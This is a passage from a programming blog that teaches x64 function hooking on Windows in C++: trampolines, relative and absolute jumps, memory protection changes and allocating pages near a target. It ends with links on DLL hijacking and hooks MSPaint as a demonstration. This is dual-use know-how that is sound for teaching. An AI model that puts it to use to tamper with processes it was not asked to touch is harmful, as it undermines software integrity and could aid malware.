<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">((</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">PushAddress</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">addr</span><span class="p">)</span> <span class="c1">//push the address of the jump target</span>
<span class="p">{</span>
<span class="n">hookJumpAddresses</span><span class="p">.</span><span class="n">push</span><span class="p">(</span><span class="n">addr</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//we absolutely don't want this inlined</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">noinline</span><span class="p">)</span> <span class="kt">void</span> <span class="nf">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">hookJumpAddresses</span><span class="p">.</span><span class="n">top</span><span class="p">();</span>
<span class="n">hookJumpAddresses</span><span class="p">.</span><span class="n">pop</span><span class="p">();</span>
<span class="n">memcpy</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">trampolinePtr</span><span class="p">,</span> <span class="o">&</span><span class="n">addr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SetOtherThreadsSuspended</span><span class="p">(</span><span class="nb">true</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//102 is the size of the "pre-payload" instructions that are written below</span>
<span class="c1">//the trampoline will be located after these instructions in memory</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="mi">102</span><span class="p">));</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">memoryIter</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">trampolineAddress</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)(</span><span class="n">memoryIter</span><span class="p">)</span><span class="o">+</span><span class="mi">102</span><span class="p">;</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteSaveArgumentRegisters</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteMovToRCX</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">,</span> <span class="n">trampolineAddress</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteSubRSP32</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span> <span class="c1">//allocate home space for function call</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteAbsoluteCall64</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">,</span> <span class="o">&</span><span class="n">PushAddress</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteAddRSP32</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteRestoreArgumentRegisters</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">);</span>
<span class="n">memoryIter</span> <span class="o">+=</span> <span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">memoryIter</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">memoryIter</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="kt">int32_t</span><span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">)));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">SetOtherThreadsSuspended</span><span class="p">(</span><span class="nb">false</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
</details></div>
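<p>One detail in AddCallToAbsTable() above is worth spelling out: the 2 byte jump uses opcode EB, whose operand is a signed 8 bit displacement measured from the end of the jump, so it can only reach targets between -128 and +127 bytes away. In the listing the absolute instruction table sits right after the jump back, so with only a few entries the distance should stay small, but nothing checks it. Here is a minimal sketch of the same encoding with an explicit range check. The helper name TryWriteShortJump is hypothetical and is not part of the repo.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical helper, not part of the post's code: writes a 2 byte "jmp rel8"
// (opcode EB) at `src` that lands on `dst`. Returns false, and writes nothing,
// if `dst` is out of range for a signed 8 bit displacement.
inline bool TryWriteShortJump(uint8_t* src, const uint8_t* dst)
{
    assert(src != nullptr && dst != nullptr);

    // The displacement is relative to the end of the 2 byte jump instruction.
    const std::ptrdiff_t rel = dst - (src + 2);
    if (rel < INT8_MIN || rel > INT8_MAX)
    {
        return false; // a rel8 jump cannot reach this target
    }

    src[0] = 0xEB;
    src[1] = static_cast<uint8_t>(static_cast<int8_t>(rel));
    return true;
}
```

<p>A caller that gets false back could bail out of building the trampoline, the same way BuildTrampoline() already bails out on loop instructions.</p>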
<h2 id="wrap-up">Wrap Up</h2>
<p>This was a fun project to work on, and I feel like all of these hooking/hacking related projects have taught me an awful lot about stuff that I took for granted before. Hopefully it was as much fun to read about as it was to figure out. Who knows, maybe one day you’ll need to add an obnoxious triangle to a third party binary and some of this will come in handy.</p>
<p>I’ve got nothing else interesting to say so I guess that means it’s time to plug my Twitter handle (<a href="https://twitter.com/khalladay">@khalladay</a>) and share a couple links I found helpful while figuring out how to make this project work. Enjoy!</p>
<ul>
<li><a href="https://guidedhacking.com/threads/what-is-dll-hijacking-fast-explanation.13607/">https://guidedhacking.com/threads/what-is-dll-hijacking-fast-explanation.13607/</a></li>
<li><a href="https://itm4n.github.io/windows-dll-hijacking-clarified/">https://itm4n.github.io/windows-dll-hijacking-clarified/</a></li>
<li><a href="https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html">https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html</a></li>
<li><a href="https://docs.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal">https://docs.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal</a></li>
</ul>
<div align="center">
<img src="/images/post_images/2021-07-14/skyrim_triangle2.jpg" />
<br /><br />
</div>
X64 Function Hooking by Example 2020-11-13T00:00:00+00:00 http://kylehalladay.com/blog/2020/11/13/Hooking-By-Example<style>
.collapsible {
padding: 10px;
background-color: #F0F0F0;
border-style: solid;
border-color: #333333;
border-width: 1px;
}
.collapsewrapper2 {
padding: 0px 0px 18px 0px;
}
</style>
<p>I’ve spent some time recently figuring out how function hooking works. There are tons of great resources available about it, but I’ve noticed that a lot of them are really light on providing example code, and the ones that do provide code tend to link to fully mature hooking frameworks. Usually the linked projects are really impressive, but they aren’t the easiest places to learn the basics from.</p>
<p>Now that I know enough to be dangerous, it seemed like fun to rectify this lack of sample code by building some hooking code from the ground up and walking through how to use that code to hook a running program. My past two blog posts were about making Notepad do weird stuff, so for the sake of variety, this post is going to pick on MSPaint instead.</p>
<p>I’m going to explain how to build 4 example programs. Two of them will show off fundamental hooking concepts by hooking functions in the example code itself. The other two will use those same concepts to hook MSPaint and make it disable the “Edit With Paint3D” button in a running MSPaint instance and force it to always draw with my favourite color (orange).</p>
<div align="center">
<img src="/images/post_images/2020-11-13/orangepaint.gif" />
<br /><br />
</div>
<p>If you’re only interested in sample code, I’ve published a github repo called <a href="https://github.com/khalladay/hooking-by-example">Hooking-by-Example</a> which has 14 increasingly complex example programs that demonstrate how function hooking works (or at least, the bits of it that I’ve figured out). Everything that I talk about here (and more) is also demonstrated by the programs in that repo.</p>
<h2 id="wtf-is-function-hooking">WTF is Function Hooking?</h2>
<p>Function Hooking is a programming technique that lets you intercept and redirect function calls in a running application, allowing you to change that program’s runtime behaviour in ways that may not have been intended when the program was initially compiled. It’s a little bit like when a dog gets into a car thinking they’re going to the park and ends up at the vet instead. The dog called goToPark(), but unexpectedly ended up inside goToVet(). This example isn’t great.</p>
<p>The real fun of function hooking is that you can use it to change the behaviour of programs that you don’t have the source code to, or otherwise can’t recompile. Combined with process injection (which I explained a bit <a href="/blog/2020/05/20/Hooking-Input-Snake-In-Notepad.html">in my last post</a>), you can use function hooks to add entirely new behaviour to any program that you can run on your pc. For example, <a href="https://reshade.me/">ReShade</a> uses function hooking to add new postprocessing effects to games, and <a href="https://renderdoc.org/">RenderDoc</a> uses a form of hooking (although not the kind covered here) to allow you to debug graphics code in running applications.</p>
<p>More examples of things you might want to do with function hooking include:</p>
<ul>
<li>Logging or replacing function arguments</li>
<li>Disabling functions</li>
<li>Measuring the execution time of a function</li>
<li>Monitoring or replacing data before it gets sent over a network</li>
</ul>
<p>The only limits are your imagination and ability to read assembly!</p>
<h2 id="how-does-it-work">How Does It Work?</h2>
<p>Let’s say we have a function that adds two Gdiplus::ARGB values together, and we want to use a hook to bypass the addition logic and always return red. The ARGB type is a DWORD that uses one byte each for Alpha, Red, Green, and Blue, ordered from the most significant byte to the least. Adding two of them together might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColors</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">a</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0xFF000000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">r</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x00FF0000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">g</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x0000FF00</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">b</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x000000FF</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">));</span>
<span class="k">return</span> <span class="n">a</span> <span class="o">|</span> <span class="n">r</span> <span class="o">|</span> <span class="n">g</span> <span class="o">|</span> <span class="n">b</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The function that we want to replace it with (which I’ll call the “payload” function), looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">ReturnRed</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mh">0xffff0000</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If this was in your own code, you’d add a “return ReturnRed(left, right)” call to the beginning of AddColors(), recompile and call it a day, but what if you couldn’t recompile it? For example, what if it’s part of a closed source third party library, or the program that calls AddColors() is already running?</p>
<p>Rather than recompiling, we can use hooking to modify its instruction bytes instead, and replace the first instruction in AddColors() with a jmp to the beginning of the ReturnRed() function. This works even if the function we want to hook comes from a system dll, since DLL code segments are copy-on-write, so there’s no chance of a hook interfering with other processes.</p>
<p>Imagine that the first instruction in ReturnRed() is located 1024 bytes after AddColors() in memory. In assembly, replacing AddColors’ instructions with a jump will look like this:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/basic_hook_thin.PNG" />
<br /><br />
</div>
<p>The jump instruction used here is a relative jump with a 32 bit operand. The opcode is E9, and that’s followed by a 4 byte signed value that represents how many bytes to jump, measured from the end of the jump instruction itself.</p>
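<p>To make the arithmetic concrete, here is a small sketch that builds those 5 bytes from two plain addresses. The helper name EncodeRelJmp32 and the addresses in the note below are made up for illustration, and nothing here touches real code memory.</p>

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <cstring>
#include <limits>

// Hypothetical helper, not part of the post's code: builds the 5 bytes of a
// "jmp rel32" placed at address `from` that lands on address `to`.
inline std::array<uint8_t, 5> EncodeRelJmp32(uint64_t from, uint64_t to)
{
    std::array<uint8_t, 5> bytes = { 0xE9, 0x00, 0x00, 0x00, 0x00 };

    // The offset is measured from the end of the jmp (the next instruction),
    // so the jmp's own 5 bytes are subtracted from the distance.
    const int64_t rel = static_cast<int64_t>(to) - static_cast<int64_t>(from + bytes.size());

    // A rel32 jump can only reach targets within roughly +/- 2GB.
    assert(rel >= std::numeric_limits<int32_t>::min() &&
           rel <= std::numeric_limits<int32_t>::max());

    const int32_t rel32 = static_cast<int32_t>(rel);
    std::memcpy(bytes.data() + 1, &rel32, sizeof(rel32)); // assumes a little-endian host, like x86/x64
    return bytes;
}
```

<p>With the payload sitting 1024 bytes past the hooked function, as in the diagram, EncodeRelJmp32(0x140001000, 0x140001000 + 1024) gives E9 FB 03 00 00: 1024 minus the 5 byte length of the jump is 1019, or 0x3FB, stored little-endian.</p>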
<p>Notice that after the jmp instruction, we’re left with garbage. This is because the process of overwriting the first 5 bytes of AddColors() left a partial instruction in its wake. The first byte of the second instruction was overwritten, but the rest of the bytes are still there, and who knows what instructions those map to. That leaves the rest of the function in an unknown (and likely invalid) state. This doesn’t matter for the example, because the program is going to jump to ReturnRed() before it ever gets to the garbage we just created, but it’s important to keep in mind.</p>
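<p>If it helps to see the partial instruction problem as numbers, here is a minimal sketch that works out how many bytes a patch really disturbs once whole instructions are taken into account. The helper name ClobberedBytes and the instruction lengths are made up for illustration; a real hook would get the lengths from a disassembler.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical helper, not part of the post's code. Given the lengths of the
// instructions at the start of a function, returns the total size of every
// instruction that is touched when the first `patchSize` bytes are overwritten.
inline size_t ClobberedBytes(const std::vector<uint8_t>& instructionSizes, size_t patchSize)
{
    size_t total = 0;
    for (uint8_t size : instructionSizes)
    {
        if (total >= patchSize)
        {
            break; // the patch ends on or before the start of this instruction
        }
        total += size;
    }
    assert(total >= patchSize && "function is shorter than the patch");
    return total;
}
```

<p>For a function that starts with instructions of 4, 3 and 2 bytes, ClobberedBytes({4, 3, 2}, 5) returns 7. The 5 byte jmp covers the first instruction and the first byte of the second, and the remaining 7 - 5 = 2 bytes are the garbage described above.</p>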
<p>We’ll write some hooks that preserve the hooked function’s original logic later in this post, so don’t worry about that too much right now. For our first example, we’ll build a program that destructively hooks a function, exactly like what’s shown in the diagram above (with some extra sauce to handle 64 bit code).</p>
<h2 id="example-1-our-first-function-hook">Example 1: Our First Function Hook</h2>
<p>Let’s roll with the example code already provided and write a program that actually redirects program flow from AddColors() to ReturnRed(). The game plan here is to end up with a main() function that looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//both functions inside the same program as main()</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColors</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">ReturnRed</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//install a hook in AddColors, going to ReturnRed</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">AddColors</span><span class="p">,</span> <span class="n">ReturnRed</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">col</span> <span class="o">=</span> <span class="n">AddColors</span><span class="p">(</span><span class="mh">0x00000000</span><span class="p">,</span> <span class="mh">0x000000FF</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">col</span><span class="p">);</span> <span class="c1">//will always be 0xFFFF0000</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>In a 32 bit program, the logic for InstallHook() can be implemented pretty much exactly how the diagram above suggests it would be:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="c1">//to fill out the last 4 bytes of jmpInstruction, we need the offset between </span>
<span class="c1">//the payload function and the instruction immediately AFTER the jmp instruction</span>
<span class="k">const</span> <span class="kt">uint32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span><span class="p">)</span><span class="n">payloadFunction</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
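<p>The offset math is the easiest part of this to get wrong, so here’s a minimal, portable sketch of just that step. It only builds the 5 bytes in a local buffer and doesn’t patch anything. EncodeRelJump32() and ExampleRelOffset() are hypothetical helper names for illustration, they aren’t part of the example project, and the addresses are made up.</p>

```cpp
#include <cstdint>
#include <cstring>

// Hypothetical helper (not from the example project): writes "E9 rel32" into out[0..4].
// jmpAddr is the address the jmp will live at, targetAddr is where it should land.
inline void EncodeRelJump32(uint8_t out[5], uint32_t jmpAddr, uint32_t targetAddr)
{
    // The offset is measured from the instruction AFTER the 5 byte jmp.
    // Unsigned wraparound produces the correct two's complement bits for backward jumps.
    const uint32_t relAddr = targetAddr - (jmpAddr + 5);
    out[0] = 0xE9;
    std::memcpy(out + 1, &relAddr, sizeof(relAddr));
}

// Worked example with made-up addresses: a jmp at 0x00401000 landing on 0x00402000.
inline uint32_t ExampleRelOffset()
{
    uint8_t jmp[5];
    EncodeRelJump32(jmp, 0x00401000u, 0x00402000u);
    uint32_t rel;
    std::memcpy(&rel, jmp + 1, sizeof(rel));
    return rel; // 0x00402000 - 0x00401005
}
```

<p>For a forward jump like the one above the offset is a small positive number. Swap the two addresses and the same subtraction wraps around to a large unsigned value, which the CPU reads as a negative 32 bit offset.</p>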
<p>Things are a bit trickier in 64 bit, because functions can be located so far away from each other in memory that a 32 bit jmp instruction can’t jump that far, meaning that the 5 byte jump written by InstallHook() might be unable to reach the payload function from the hooked function.</p>
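<p>To make “can’t jump that far” concrete, here’s a small sketch of a reachability check. FitsInRel32() is a hypothetical name, not something from the example project, and it assumes the jump is the 5 byte E9 form used above.</p>

```cpp
#include <cstdint>

// Hypothetical helper: true if a 5 byte E9 jmp located at jmpAddr can reach targetAddr.
inline bool FitsInRel32(uint64_t jmpAddr, uint64_t targetAddr)
{
    // The displacement is measured from the end of the 5 byte instruction
    // and has to fit in a signed 32 bit value (roughly +/- 2GB).
    const int64_t delta = (int64_t)(targetAddr - (jmpAddr + 5));
    return delta >= INT32_MIN && delta <= INT32_MAX;
}
```

<p>Two functions inside the same module will almost always pass this check. A function in the exe and a payload in a dll loaded far away in a 64 bit address space often won’t.</p>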
<p>There’s no such thing as a 64 bit relative jmp instruction, so the next best option is to jmp to an address stored in a register, like the assembly shown below. Note that this snippet uses the r10 register because it’s one of the few volatile registers that isn’t used for passing function arguments in the Windows x64 calling convention (<a href="https://docs.microsoft.com/en-us/cpp/build/x64-calling-convention?view=vs-2019">msdn link</a>).</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">49 BA 00 04 00 00 00 00 00 00 mov r10,400h
41 FF E2 jmp r10 </code></pre></figure>
<p>If we put this at the beginning of hooked functions instead of the 5 byte jump from before, we’d only be able to hook functions that are at least 13 bytes long. That’s a significantly bigger limitation than our 32 bit code has, so we’re instead going to write the bytes for this absolute jump somewhere in memory that’s close to the function we’re hooking. Then we’ll have the 5 byte jump we install in that function jump to this absolute jump, instead of straight to the payload function. <a href="https://github.com/TsudaKageyu/minhook">Minhook</a> refers to this absolute jump as the “relay function,” and I’m going to use that terminology as well.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/64bit_basic_hook.PNG" />
<br /><br />
</div>
<p>Writing code to do this little dance is similar to the InstallHook() function shown above, but with a few more steps. The trickiest part of the process is allocating memory for the relay function that’s close enough to the target function to be reachable by a 5 byte jump. I’ve implemented logic for this in a function called AllocatePageNearAddress(). This function is a bit long, so I’ve included its implementation in the (expandable) box below, and omitted it from the sample code snippet immediately after that.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>AllocatePageNearAddress() implementation (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="c1">//clamp the search window to addresses that are both valid and within reach of a 32 bit relative jmp</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">((</span><span class="n">startAddr</span> <span class="o">></span> <span class="mh">0x7FFFFF00</span><span class="p">)</span> <span class="o">?</span> <span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span> <span class="o">:</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
